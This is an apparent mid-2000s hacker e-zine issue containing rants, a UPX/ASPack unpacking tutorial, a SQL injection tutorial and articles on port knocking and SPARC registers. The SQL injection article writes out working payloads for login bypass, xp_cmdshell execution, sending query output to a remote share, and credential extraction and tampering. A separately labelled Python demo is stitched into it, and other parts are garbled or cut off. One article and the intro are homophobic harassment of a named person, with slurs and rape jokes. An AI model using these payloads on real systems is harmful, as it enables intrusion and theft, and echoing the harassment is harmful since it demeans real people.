l'elephants avec les trunks huge izzue un ___ ___ / \____/ \ / / __ \ \ / | .. | \ \___/| |\___/\ | |_| |_| \ | |/|__|\| \ | |__| |\ | |__| |_/ / \ | @ | | @ || @ | ' | |~~| || | -The jelqing elephant- 'ooo' 'ooo''ooo' "don't make fun of the circus animals!" * death to capitalism * feed the socialists * bush is evil * * let's all do drugs * working is for capitalists * * les francais toujours! * -------------------------------------------- # Un - l'Introduction Bonjour et valkomen to izzue un of 'l'elephants avec les trunks huge'. Before we commence, some shout outs are in order: SHOUT OUTZ: #b4b0, chrak (for the drugz), #phrack, #2600, tymat. \ / 31337 Et maintenant pour les zine..... what can we say for intro? Dunno... how about DOWN WITH CAPITALISM! IF YOU VOTED FOR BUSH YER ST00pID or something. FRANCE IS NUMBER UN! EVERYONE DO DRUGS AND NOBODY WORK AND LET'S ALL BE FAGS AND DO WHATEVER WE WANT WITH NO RESTRAINT! IT IS THE ONLY LOGICAL WAY!!! MORALS == ARBITRATION! ANARCHHYYYYYYYYY ANARCHYYYYYY FOREVERRRRRRRRRRRRRRRRR WE ARE EDUCATED YEW ARE NOT HAHA! Also please drive hydrogen powered cars and wear beads and smoke pot and denounce anything that becomes even mildly popular. Remember, YOU are ENLIGHTENED!!! You may not be able to explain exactly why you hate structure and order and things that have been proven by time, but WHO CARES?!?!?!?! WE ARE IN THE 21st CENTURY AND ARE BETTER THAN THE CAVE MEN THAT EXISTED ON EARTH 100 YEARS AGO. SO YOOOOOOOOOO0000000000000. IF YOU DO DRUGS ITZ OK CAUSE SOCIETY WILL PAY TO PUT YOU IN THE HOSPITAL! WERDDDDDDDD TO SOCIALISM! YAY CANADA! Idiots. Read on you fucking socialist leaches. FREE KEVIN! We worked hard to bring you this zine! Thanks to contributors! No matter what contributors or b4b0 or anyone else may say, this is 100% grade-A original! They are just jealous capitalists who probably carry guns *shiver*. As you will no doubt notice, there's nothing particularly substantive in here. 
Mainly dribble copied and modified slightly from computer books and online texts. BUT WHO CAREZZZZZZ?!?!?!?! We're here for PROPS and THATZ IT!!@#$ brought to you by: l'elephants and so forth memberz: wouldn't you like to know? ...and a generous grant from the Karl Marx Foundation "Every time I see a gun I piss my pants" -- our founder ***************************************************************************** -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ***************************************************************************** WORLD NEWS: "...The ascii icons foundation wishes to welcome its newborn member, totally fag-free, worksafe ATI© icon. ATI©, or the ASCII Thinking Icon which is represented by these three caracers consecutively: : double-point (<-- french) D open mouth that adds the twist of fun to the mix ? the innovative hand-scratching-chin imitation of real life deep thinking situations posture..." :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? The ascii thinking icon " :D? " © is published under the GNU public Lisence. and could be distributed, used, published and implemented in your IRC chatting lexic according to the GPL. examples on how to implement this 0day tech/art module in your IRC chatting: example #1 h0h0 hm should i take a piss :D? example #2 this code you just sent me doesnt compile well I think it needs reviewing :D? Have fun with it! XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 'lelephants BRINGING DIRECTION TO YOU XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .[ #b4b0 @ efnet re-opened for public and gay as ever ]. WERD TO LES ANIMAUX!!@#$ .-------->[FREEWAY OPEN:B4B0]<----------. 
| ROAD CONDITIONS | V $ [*] 59 North CAUSION: Hevy Dope Fog | + ph1x $ [x] E18 East OPEN: CAUSION SWERVED | + rdxz $\ [u] 99 North OPEN: Slight Winds | \ + crypt1 $ \ [o] 10 West OPEN: Delivering Your Milk |______\________ + MiLk-MaN $_______________| [+] 91 South CLOSED: Banging Your Mom | / | | + tsai $ / | | [z] | / | _|_____________________________ + $ / | | [%] Route 20 East CAUSION: ROAD WORK | | | rdxz moms house: 3,334 miles + cervix $ | | ph1x drug lab: 1.45 miles [i] 49 North Closed: Flooding | | | San Fransisco: 534 miles + polder $ | | m4tts house: 535 miles [+] 50 West Closed: Rock Slide | | | House of Kung Foo: -20 miles + lusta $ | | h00kahs Canadian House [%] 1 South Open: Mexico Bound | | | Of Bacon: Not Far enough + p4bell $ | | gH Jail Cell: 734 miles V | | | | | | |______________________________| `------->[ We Be Grubbin !!! ]<--------' | | || || | | || || | | || || | | || || .......[ issue # 011 7/05].....................................|___|........||.............|| [I]=[0x00] INTRO .x.[chrak].x. [*] :S: :*: [S]=[0x01] Learning To Hate People With MoNEy .x.[UNKNOWN].x. [B] :U: :4: [E]=[0x02] aspack unpacking with OllyDbG / upx unpacking with OllyDbG .x.[dvdman].x. [B] :*: :0: [#]=[0x03] Basic SQL Injection Tekneeqs and Protection .x.[dieSLoW].x. [H] :0: :E: [1]=[0x04] Re-Designed Port Knocking Security .x.[crypt1].x. [H] :1: :B: [*]=[0x05] MaTT BASHING-GAY BASHING .x.[crypt1].x [4] :*: :B: [*]=[0x06] understanding sparc stacks and registers .x[m0lted aka rdxz].x [0] : : :*: [*]=[0x07] How to build a leet recording spy kit .x[wolfinux].x [4] : : :L: [*]=[0x08] Basic guide to The XINU O/S .x[m0lted aka rdxz].x [I] : : :F: [*]=[0x09] Making the Perfect Summertime Lemonade .x[t.Transient] [E] : : :*: [*]=[0x0A] EMPTY SPACE HERE [*] :.:......................................................................................' XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x00] INTRO .x.[chrak].x. 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX OFFICIAL b4b0 drink: summertime lemonade PEICE ABOUT b4b0 10 BEING MORE SHITTY THEN THIS AND BEING SKIPPED TO 11 WELL WELL WELL THIS IS WHERE THE INTRO IS GOING. yes we are having http://www.chrakworld.com pimped in this issue. . . . . . . . . [lelephant note: .... what?] XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x01] Learning To Hate People With MoNEy .x.[UNKNOWN].x. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [Another fine article brought to yuo by b4b0!!!!1!! -ed] Welcome people, is about Big Money Bullshit. I don't know about everyone else, but i can tell you, that it pisses me the fuck off,every time i see one of thoughs "Self Serv Checkout Registers". I've seen them in a few places now. Mostly companies like Walmart and Home Depot are starting to eliminate HUMAN work. For these bullshit self checkout systems. Now its bad enough that these companies move into every town and take out mom&pop shops where, they buy things in bulk and sell them for a discount . But to take away jobs, i feel this should be a human right concern. I can understand Teknology but where do you draw the line. Most places use 4 - 8 self serving registers which are monitored by 1 real person. That means 3-7 jobs are taken away from one store at one shift. So lets say they have 2 shifts thats 6 to 14 jobs per store. Now if u want to get realy teknical lets look at how many of these stores there are. Im gong to just give a uneducated guess. For the sake of argument lets say theres 1,000 Walmarts, (everyone knows theres more). now thats 14,000 jobs they just elminated. Lets do some math. now 14,000 * 10$hr = $140,000 * 8 = $1,120,000 day * 7 = 7,840,000 week.. ect. Now thats alot of money you say. I say thats pocket change for the amount of jobs that are being taken away for such a simple idea. 
Thats just greed, they already have a huge margin of business, why do they need to take jobs away from us. What i would like to know when its enough?, or whats next? Are we going to be going to school though our computers or Tv's? Dam, wait that shits already in progress.... How lazy are we becoming? I hope someone is as pissed off about this shit as i am. I hope im not the only one that this shit bothers. I mean think about it, these companys are just having us shop in a warehouse, checking our self out, just having someone make sure we arent stealing and thats it. Anyways I'm done bitching, i just think this shit is FUCKED UP.

. . . . . . . .

[lelephant note: How profound.]

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x02] aspack unpacking with OllyDbG / upx unpacking with OllyDbG .x.[dvdman].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Software used: UPX 1.24, OllyDbg, OllyDump, Imprec

I have seen lots of tuts for UPX and they make things quite crazy/complex so I made this little tut just to show/teach you all how simple it is and allow any kid to do it :P

Ok, so here goes

The start of any upx packed executable will look like this in OLLYDBG

(PACKER ENTRY POINT) - PEP

    60              pushad
    BEAEB04000      mov esi,xxxxxxx
    8DBE525FFFFF    lea edi,[esi+xxxx]
    57              push edi
    83CDFF          or ebp,-001
    EB10            jmp xxxxxx           ;Unpacking Loop (useless to follow)

In all other tuts I have seen the authors make you follow this jmp and follow the instructions to find the OEP. I know its a useful idea to teach you about other packers but hell we just want to unpack UPX dont we :P

So scroll down a bit and you will see something like the following:

(UNPACK INSTRUCTIONS)

    FF96 D0AE0100   CALL DWORD PTR DS:[ESI+1AED0]
    61              popad                ;Restore Registers
    E90826FFFF      jmp xxxxx            ;(OEP) Of The Unpacked Program

Goto the line with the POPAD and put a breakpoint using f2.
Then press F7 one time and you will land on the JMP XXXX instruction this is our OEP so remember this. Now press F7 one more time and it will land you in the REAL UNPACKED code. Wow that was hard wasnt it? ok now click plugins->ollydump->Dump Debugged Process. Leave all the options alone and note the Entry point value which is next to the (GET EIP as OEP) button.

OK, now we have a unpacked exe file which does not run. So whats your first guess what we need to fix? IMPORT TABLES correct your a genius now. So lets fire up Imprec and fire up the orig packed program and attach to the orig process. Remember that address I told you to note? ok type it into the (OEP) box do not worry about adding in the zeros it will do it for you. Mine was (6AE0) so I enter it in.

Now click IAT auto search and wait a second. Now click (Get Imports). click show invalid and if you see any that say ( VALID:NO ) Press the (Auto Trace) button and wait. now click (Fix Dump) and select the unpacked file you saved.

WHOLA, we are done and the program is now unpacked and running. You may want to remove the UPX0 tags in the headings but i wont get into that here.

NOTES: sorry to all you unpacker gods, for not making this super complex for all the newbs :P

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

Software used: ASPACK (any version), OllyDbg, OllyDump, Imprec

I have seen lots of tuts for ASPACK and they make things quite crazy/complex so I made this little tut just to show/teach you all how simple it is and allow any kid to do it :P

Ok, so here goes

The start of any aspack packed executable will look like this in OLLYDBG

(PACKER ENTRY POINT) - PEP

    01013001 >  60              PUSHAD
    01013002    E8 03000000     CALL NOTEPAD.0101300A
    01013007   -E9 EB045D45     JMP 465E34F7
    0101300C    55              PUSH EBP
    0101300D    C3              RETN

In all other tuts I have seen the authors make you follow this call and follow the instructions to find the OEP.
I know its a useful idea to teach you about other packers but hell we just want to unpack ASPACK dont we :P

So scroll down a bit and you will see something like the following:

    010133AF    61              POPAD                      <-- break point
    010133B0    75 08           JNZ SHORT NOTEPAD.010133BA <--- F7
    010133B2    B8 01000000     MOV EAX,1
    010133B7    C2 0C00         RETN 0C
    010133BA    68 E06A0001     PUSH NOTEPAD.01006AE0      <-- will land here and press F7
    010133BF    C3              RETN                       <--- F7

*hint* in olly you can press CTRL-B and type in 61 75 in the HEX +02 box and it will find this for you. How cool for olly ;)

ok, so set a break point on the popad and press f9 to run the program and it should break on this spot then f7 till you hit the push and then f7 into the ret and then dump.

    01006AE0    6A              DB 6A    ; CHAR 'j'
    01006AE1    70              DB 70    ; CHAR 'p'
    01006AE2    68              DB 68    ; CHAR 'h'
    01006AE3    88              DB 88
    01006AE4    18              DB 18

will look something like this all messed up. You can press CTRL-A to analyse the code to see what it looks like.

After you do the dump you will need to fix it with imprec. I will not cover this process here. I may write a howto for imprec someday.

NOTES: sorry to all you unpacker gods, for not making this super complex for all the newbs :P

MORE TUTS COMING SOON

. . . . . . . .

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x03] Basic SQL Injection Tekneeqs and Protection .x.[dieSLoW].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

#b4b0 - diesl0w [05/19/04]

-- TABLE OF CONTENTS

Chapter 1 - Introduction
Chapter 2 - What To Look For?
Chapter 3 - Vulnerability Testing
Chapter 4 - Get Remote Execution
Chapter 5 - OUTPUT via SQL Query
Chapter 6 - Updating/Inserting Data into the database
Chapter 7 - Protecting against SQL Injection
Chapter 8 - Other Places To Visit
Chapter 9 - Shout Outs

Summary: The following article will get your foot in the door with the basic SQL Injection techniques and attempt to help you fully understand the methods used to prevent attempts and/or to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques and to protect themselves from such attacks.

-- Chapter 1 - Introduction

When a machine has only port 80 opened, your most trusted vulnerability scanner won't return anything useful, and you know that the admin always patches his server, we have to turn to finding vulnerabilities in their web server. SQL injection is one type of web server intrusion that requires nothing but port 80 and it might just work even if the admin is patch-happy. It attacks the web application (like ASP, JSP, PHP, CGI, etc) itself rather than the web server or services running in the OS.

This article does not introduce anything new, SQL injection has been widely written about and used in the wild. The article was written basically because we would like to document some of the techniques used during SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out Chapter 8, "Other Places To Visit", for people who truly deserve credit for developing many techniques in SQL injection.

1.1 What is SQL Injection?

It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user logs in: the web page takes that user name and password and makes a SQL query to the database to check if a user has valid name and password.
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

-- Chapter 2 What To Look For?

Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
Everything between the <FORM> and </FORM> tags
have potential parameters that might be exploitable.

-- Chapter 3 Vulnerability Testing

Start with a single quote trick. Input something like:

    hi' or 1=1--

Into login, or password, or even in the URL. Example:

    - Login: hi' or 1=1--
    - Pass: hi' or 1=1--
    - http://exploitable.host.com/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
If luck is on your side, you will get login without any login name or password.

-- Chapter 4 Get Remote Execution

Being able to inject SQL command usually means we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

    '; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

    #tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

-- Chapter 5 OUTPUT via SQL Query

It is possible to use sp_makewebtask to write your query into an HTML:

    '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must have the folder "share" shared for Everyone.

5.1 Grabbing Data

Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

    http://exploitable.host.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
    /index.asp, line 5

We now know there is an admin user with the login name of "neo".
Finally, to get the password of "diesl0w" from the database:

    http://exploitable.host.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='diesl0w'--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'temp123' to a column of data type int.
    /index.asp, line 5

We can now login as "diesl0w" with his password "temp123".

-- Chapter 6 Updating/Inserting Data into the database

When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":

    http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'temp123' WHERE login_name='diesl0w'--

To INSERT a new record into the database:

    http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "diesl0w" with the password of "temp123".

-- Chapter 7 Protecting against SQL Injection

Filter out characters like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:

    - Input from users
    - Parameters from URL
    - Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

    master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

-- Chapter 8 - Other Places To Visit

One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
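For Chapter 7 above, an added example (not part of the original article) that puts a concatenated login query next to a bound-parameter one and applies the chapter's convert-to-integer rule to a numeric id. It goes one step past the character filter the chapter lists by binding values instead of pasting them into the SQL text. It uses Python's sqlite3 with an in-memory database rather than ASP and MS SQL Server; the function names, the articles table and all row values are constructed for illustration, and only the admin_login column names come from the article.

```python
import sqlite3


def make_db():
    """In-memory database with constructed sample rows (no real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin_login (login_id INTEGER PRIMARY KEY, "
        "login_name TEXT, password TEXT, details TEXT)"
    )
    conn.executemany(
        "INSERT INTO admin_login VALUES (?, ?, ?, ?)",
        [(1, "neo", "constructed-pw-1", "NA"),
         (2, "diesl0w", "constructed-pw-2", "NA")],
    )
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO articles VALUES (10, 'constructed article')")
    return conn


def login_concatenated(conn, name, password):
    """BEFORE: input is pasted into the SQL text, so a quote ends the literal."""
    sql = (
        "SELECT login_name FROM admin_login WHERE login_name = '" + name +
        "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, name, password):
    """AFTER: values are bound as data and never parsed as SQL."""
    sql = "SELECT login_name FROM admin_login WHERE login_name = ? AND password = ?"
    row = conn.execute(sql, (name, password)).fetchone()
    return row[0] if row else None


def article_title(conn, raw_id):
    """Chapter 7's numeric rule: convert to an integer first, then bind it."""
    try:
        article_id = int(raw_id)
    except (TypeError, ValueError):
        return None  # reject anything that is not a plain integer
    row = conn.execute(
        "SELECT title FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    probe = "hi' or 1=1--"  # the test string from Chapter 3
    print("concatenated :", login_concatenated(db, probe, probe))
    print("parameterized:", login_parameterized(db, probe, probe))
    print("numeric id   :", article_title(db, "10"))
    print("tainted id   :", article_title(db, "10 UNION SELECT TOP 1 login_name FROM admin_login--"))
```
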
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

A good summary of SQL Injection on various SQL Server on
http://www.owasp.org/asac/input_validation/sql.shtml

SensePost's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm

-- Chapter 9 - Shout Outs

Just want to give a shout-out to the following: All old school gH members, might have split and went separate ways, but not forgotten.. #cha0s @ Unet, #innuendo @ Unet, #LinuxHQ @ Unet/EFnet, #coders @ EFnet, #b4b0 @ EFnet, #sketchy @ EFnet, #hurricane @ EFnet zeb0r, exempt, clops, icbm, mosthated, mindphasr, REWN, and my people helping out on EFX Inc.

. . . . . . . .

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x04] Re-Designed Port Knocking Security .x.[crypt1].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Hello everyone, im crypt1, ill be your guide through this article. Basically im going to be expressing some old ideas, some recent ideas, and kind of give a few new ideas. Lets start out on some old ideas. Now im assuming everyone reading this will have a basic understanding of port knocking / os fingerprinting. But before you run off just take a little trip with me :>.

I was sitting back for a few days playing with O/S detection and the concept of Port Knocking. I figured that port knocking is a good idea, but needs improvements. Well i kind of came up with a new design or a way of doing port knocking. As some of u might know Port Knocking is usually setup on a system to open closed services to privileged (Private) users. The way most people set up port knocking is they have a firewall with a set of ports if not all ports firewalled, then they have a perl script tailing the log file of the connect()'s tried.
Well when a sequence lets say ours is port 6 24 18 10 78 441 5 1, when those ports are tried scanned in x amount of time, our perl script would then tell the firewall to allow this ip address access to a certain port. Well thats just fine and dandy. There is some security in that. Which is just one layer of security. But heres where we start to add to the idea. What if we were to create a private reply seq:

NMAP PRINT OUT: (NORMAL SYSTEM READOUT)
(FAKE SYSTEM ID:x.b4b0.corenetwork.co.va.rz.moon.crazy)
TSeq(Class=TD%gcd=<00F4%SI=<00F4%SI= Server, PING TO Server ->client:

Server:

    64 bytes from priv.serv (0.0.0.0): icmp_seq=1 ttl=49 time=33.0 ms
    64 bytes from priv.serv (0.0.0.0): icmp_seq=2 ttl=49 time=31.5 ms

(NOTE: Lets Average out Time with 2 requests: 32.25 )
(USAGE: We will send 32.25 value to the client via Stunnel , which will be the clients key for its algorithm)

CLIENT:

    64 bytes from priv.client (0.0.0.0): icmp_seq=1 ttl=49 time=32.7 ms
    64 bytes from priv.client (0.0.0.0): icmp_seq=2 ttl=49 time=30.6 ms

(NOTE: Lets Average out Time with 2 requests: 31.65 )
(USAGE: Key assigned by Server: 32.25 (Client: MSG: 31.65)

We can then Note that the ping value wont be too far apart (we could even go more into this but i wont now), which would set our values for our Pre set algorithm :). Once Authenticated through that, You Could then Setup a USER/PASSWD port for another method of security using a SSL type Connection. It Just depends how Sensitive you want to be with your network :).

Now Lets kind of lay this all out on how to make something like this:

Client Script: (NOTE: U WILL WANT TO USE A REAL SCRIPTING LANGUAGE! HEH)

    value = run(./authinicate)                 // RUN AUTHENTICATION SCRIPT
    if (value = 1) { program failed }          // GET VALUE OF AUTHENTICATION SCRIPT
    if (timeoutvalue = currentime) {
        loop(tryagain!)                        // IF AUTHENTICATION SCRIPT TAKES X TIME RETRY
    }
    else {                                     // ELSE
        ./$myprogram                           // IT WORKED NOW CONNECT TO X PORT WITH UR PROGRAM
    }

Client AUTH SCRIPT: (NOTE: THIS ISNT A REAL SCRIPT JUST GIVES IDEA HOW TO DO IT)

    connect(PORTs)                             // CONNECT TO PORTS IN SEQUENCE!
    ping(serv)                                 // PING FOR ENCRYPTION MSG
    getkey(thekey)                             // GET KEY FROM SERVER FOR ENCRYPTION
    encrypt(thekey,pingvalue);                 // ENCRYPT PING VALUE WITH KEY VALUE GIVEN
    send(encrypt-msg);                         // SEND ENCRYPTED MSG WITH KEY VALUE SENT FROM SERVER
    return(value)                              // RETURN VALUE OF SUCCESS OR *

Server Script: ( NOTE: U WILL WANT TO CREATE UR OWN REAL SCRIPTS )

    fmsg = tail_firewall_log()                 // TAIL THE LOG FILE FOR CONNECTS():
    parse(fmsg)                                // CREATE A PARSE FOR YOUR TAIL (LOOK FOR UR CONNECT SEQUENCE)
    match(ports)                               // IF PORTS MATCH
    if (portvalues = private_user) {           // IF PORTS MATCH DO THIS
        fingerprint(pr-user)                   // FINGER PRINT USER FOR SPECIAL TCP SEQUENCE
        if (pr-print = pr-pr-print) {          // IF FINGER PRINT MATCHES SPECIAL TCP SEQUENCE
            getpingdelaytime(pr-user)          // GET PING TIME FROM CLIENT CONNECTING
            send(pr-user,key)                  // SEND AVERAGE AS KEY ALGORITHM VALUE!
            get_responce()                     // GET RESPONSE FROM ALGORITHM KEY
            if (resp-pr-user = correct) {
                openfirewall(user-ip,service)  // IF MATCHES OPEN PORT FOR THIS CLIENT ONLY!
            }
        }
    }

Current Software that accomplish parts of this:

FPF: "Fingerprint Fuck" www.packetstormsecurity.nl
NOTES: Fingerprint Fuck changes your Fingerprint information, its a LKM, so depending on Kernel version u might need to add support.

knock: "Port Knocker" www.packetstormsecurity.nl
NOTE: This software is just one example of port knocking.

MAIN NOTE: Please Realize that both software listed above are just starting points for this project, both programs should just be used as a reference point if u dont understand how to do something. The programs listed would need alot of modification to accomplish this task.

JUST ANOTHER B4b0 PRODUCTION [ CRYPT1 ]

(Obsecurity isnt security, but what if we add security to obscurity would it be security then?
:) )

. . . . . . . .

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x05] MaTT BASHING-GAY BASHING .x.[crypt1].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

[ED NOTE: crypt1 must be Ghey to make this but we need Quality Content to fill our pages!]

.-~'~. (.~ `. < To MucH D1ck From the NigHT b4 I x O ) g0t (_o_) ?: m4tt [tm] | __ / `\ U .` `~`

10 TOP THINGS YOU DONT NEED TO KNOW:

10. M4tts Gay.
9. He has Aids.
8. Reverting back to 10, m4tt likes ass.
7. Matt has recived a Reward from the Insitute of Cock suckers for not chocking on a 8 1/2 dick.
6. Matt puts out an add in the San Fransisco Times offering money to be gang raped.
5. Matt gets arrested for suliciding sex.
4. Matt is gang raped while in jail with a chizzel.
3. No one likes gay matt.
2. Matt keeps begging to be in b4b0.
1. Baned for being gay #b4b0 m4tt@smokin.crackrock.net

. . . . . . . .

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x06] understanding sparc stacks and registers .x[m0lted aka rdxz].x
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

The meaning of this article is to put together various information and make a reasonable article about understaind Sparc stacks and registers.

Sparc got 32 general purpose integer registers visible to the program at any time. From these 32, 8 registers are global, and 24 registers are in a register window. One window consists of 3 groups of 8 registers, the out, local and in registers. A sparc implementation can consist of 2 to 32 windows, even thou the most consists of 7 or 8 windows.
The registers variable number is the main reason sparc is "scalable".

The only 1 window that can be visible is determined by the CWP (current window pointer, which is part of the processor status register (PSR)). This is a five bit value that could be decremented/incremented by SAVE and RESTORE instructions. Those instructions are executed on procedure call and return. Basic idea being that the in registers contain incoming parameters, the local registers make scratch registers, the out registers contain outgoing parameters and the global registers contain values that don't vary much between executions.

The register windows overlap partially so the out registers become renamed by SAVE to become the in registers of the called procedure. Because of this, the memory traffic is lowered when going up and down the procedure call. Because this is a frequent operation the performance is improved. That is at least the basic idea.

Here's a table illustrating the overlap of registers (taken from Peter Magnusson):

    register group    mnemonic    register address
    ~~~~~~~~~~~~~~    ~~~~~~~~    ~~~~~~~~~~~~~~~~
    global            %g0-%g7     r[0]-r[7]
    out               %o0-%o7     r[8]-r[15]
    local             %l0-%l7     r[16]-r[23]
    in                %i0-%i7     r[24]-r[31]

Here you are able to see an implementation with 8 windows, numbered 0 to 7 ("w0" to "w7" in the table). Each window coincides to 24 registers, 16 of these are shared with other windows. Windows are arranged so like, window #0 borders #7. The usual cause of changing the topical window as pointed to by the Current Window Pointer, is the RESTORE and SAVE instructions that you can see in the middle. More rare is the supervisor RETT instruction (return from trap) & the trap event (interrupt, exception, or the TRAP instruction).

-----------------------------------------
Figure (sparcwin.gif):
-----------------------------------------

In the top of the left of the figure, the "WIM" register is indicated. The Window Invalid Mask is a bit map of valid windows. It's used as a pointer, ie. exactly one bit is set in the WIM register, which indicates which window is invalid. In our figure (also taken from Peter's homepage, along with a lot of info, thx) it's window 7. Register windows are used to support procedure calls, so they could be looked at as a cache of the stack contents. The Window Invalid Mask (WIM) pointer indicates the number of how many procedure calls in a row can be taken without writing out data to the memory. In our figure the capacity of the register windows is fully utilized. Another potential call will therefore exceed its capacity and trigger a window overflow trap. A window underflow trap occurs when the register window cache at the other end is empty and more data has to be fetched from memory.

That's it. Props for the article goes to Peter for being the resource of nearly everything here. This is basically my own way of expressing it all, no m4d 0d4y inph0z, sorry - just some good old useful txt you can't get too much of.

Just for the hell of it, i've added some ascii of the typical layout of the sparc stack frame here:

                 low addresses
            +-------------------------+
    %sp --> | 16 words for storing    |
            | LOCAL and IN registers  |
            +-------------------------+
            | one-word pointer to     |
            | aggregate return value  |
            +-------------------------+
            | 6 words for callee      |
            | to store register       |
            | arguments               |
            +-------------------------+
            | outgoing parameters     |
            | past the 6th, if any    |
            +-------------------------+
            | space, if needed, for   |
            | compiler temporaries    |
            | and saved floating-     |
            | point registers         |
